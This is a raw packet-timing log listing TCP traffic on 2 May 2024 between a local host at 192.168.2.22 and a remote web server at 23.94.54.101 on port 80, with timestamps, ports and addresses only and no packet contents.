May 2, 2024 04:59:08.647176981 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.647176981 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.647294044 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.650943041 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.650957108 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.650984049 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651001930 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.651002884 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651027918 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651041031 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651042938 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.651072979 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.651089907 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651102066 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651139975 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.651149988 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651206017 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651216984 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651231050 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651242018 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651246071 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.651266098 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.651267052 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651298046 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651309967 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651319027 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.651321888 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651345968 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.651355028 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651375055 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651392937 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.651417971 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651458979 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.651463032 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651521921 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651535034 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651546955 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651563883 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651571035 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.651592016 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.651593924 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651633024 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.651637077 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651695967 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651735067 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.651770115 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651782990 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651822090 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.651869059 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651881933 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651894093 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651904106 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651915073 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651917934 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.651926041 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651931047 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.651941061 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.651967049 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.652000904 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.652013063 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.652024031 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.652035952 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.652039051 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.652065039 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.652071953 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.652095079 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.652115107 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.652136087 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.652175903 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.652946949 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.656033993 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.656048059 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.656071901 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.656102896 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.656135082 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.656147003 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.656157970 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.656169891 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.656172037 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.656199932 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.656223059 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.656235933 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.656263113 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.656285048 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.656296968 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.656332016 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.656344891 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.656358004 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.656367064 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.656377077 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.656385899 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.656413078 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.656435966 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.656466007 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.656502008 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.656507015 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.656553984 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.656567097 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.656577110 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.656595945 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.656615019 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.656645060 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.656708002 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.656718969 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.656732082 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.656744003 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.656748056 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.656759024 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.656773090 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.656807899 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.656814098 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.656829119 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.656838894 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.656860113 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.656862974 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.656897068 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.656919956 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.656968117 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.656979084 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.657012939 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.657025099 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.657035112 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.657038927 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.657078028 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.657085896 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.657097101 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.657109976 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.657130957 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.657145977 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.663815022 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.663851023 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.663877010 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.663889885 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.663934946 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.663938046 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.663950920 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.663990021 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.664012909 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.664025068 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.664036036 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.664078951 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.665510893 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.667994022 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.756812096 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.756891012 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.756956100 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.756988049 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.757030010 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.757044077 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.757062912 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.757062912 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.757067919 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.757080078 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.757082939 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.757124901 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.757138968 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.757150888 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.757160902 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.757184029 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.757214069 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.757225990 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.757262945 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.757271051 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.757313967 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.757316113 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.757359982 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.757374048 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.757384062 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.757405996 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.757419109 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.757426977 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.757474899 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.757512093 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.757534027 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.757570028 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.757581949 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.757611990 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.759835005 CEST  49163  80  192.168.2.22  23.94.54.101
May 2, 2024 04:59:08.760343075 CEST  80  49163  23.94.54.101  192.168.2.22
May 2, 2024 04:59:08.760354996 CEST  80  49163  23.94.54.101  192.168.2.22
                                                                    May 2, 2024 04:59:08.760391951 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.760400057 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.760438919 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.760451078 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.760479927 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.760526896 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.760564089 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.760580063 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.760620117 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.760657072 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.760660887 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.760674000 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.760704041 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.760723114 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.760765076 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.760783911 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.760806084 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.760864019 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.760879040 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.760889053 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.760905981 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.760912895 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.760924101 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.760930061 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.760936975 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.760948896 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.760957003 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.760983944 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.761019945 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.761092901 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.761132956 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.762187958 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.762200117 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.762209892 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.762239933 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.762248039 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.762260914 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.762281895 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.762289047 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.762319088 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.762343884 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.762500048 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.762537956 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.762541056 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.762553930 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.762576103 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.762587070 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.762644053 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.762686014 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.762689114 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.762698889 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.762728930 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.762734890 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.762783051 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.762824059 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.762880087 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.762933969 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.762943983 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.762970924 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.762994051 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.763032913 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.763046026 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.763067961 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.763096094 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.763106108 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.763166904 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.763178110 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.763202906 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.763232946 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.763278961 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.763278961 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.763334036 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.763345957 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.763376951 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.763376951 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.763389111 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.763411045 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.763427973 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.763457060 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.763472080 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.763482094 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.763504982 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.763523102 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.763531923 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.763535976 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.763585091 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.763602018 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.763614893 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.763633966 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.763653040 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.763653994 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.763688087 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.763720036 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.763761044 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.763772964 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.763802052 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.763814926 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.763825893 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.763834953 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.763854980 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.763864040 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.763885021 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.763891935 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.763899088 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.763917923 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.763936996 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.763958931 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.763999939 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.764007092 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.764065981 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.764115095 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.764136076 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.764146090 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.764180899 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.764204979 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.764218092 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.764226913 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.764259100 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.764271975 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.764319897 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.764323950 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.764336109 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.764363050 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.764372110 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.764420986 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.764470100 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.764470100 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.764482975 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.764493942 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.764522076 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.765470028 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.765511990 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.765528917 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.765539885 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.765577078 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.765599012 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.765610933 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.765621901 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.765633106 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.765641928 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.765669107 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.765700102 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.765712023 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.765721083 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.765742064 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.765743971 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.765779972 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.765784025 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.765799046 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.765809059 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.765827894 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.765830994 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.765867949 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.765901089 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.765932083 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.765960932 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.765976906 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.765978098 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.766021967 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.766038895 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.766048908 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.766082048 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.766096115 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.766107082 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.766144991 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.766165018 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.766175985 CEST804916323.94.54.101192.168.2.22
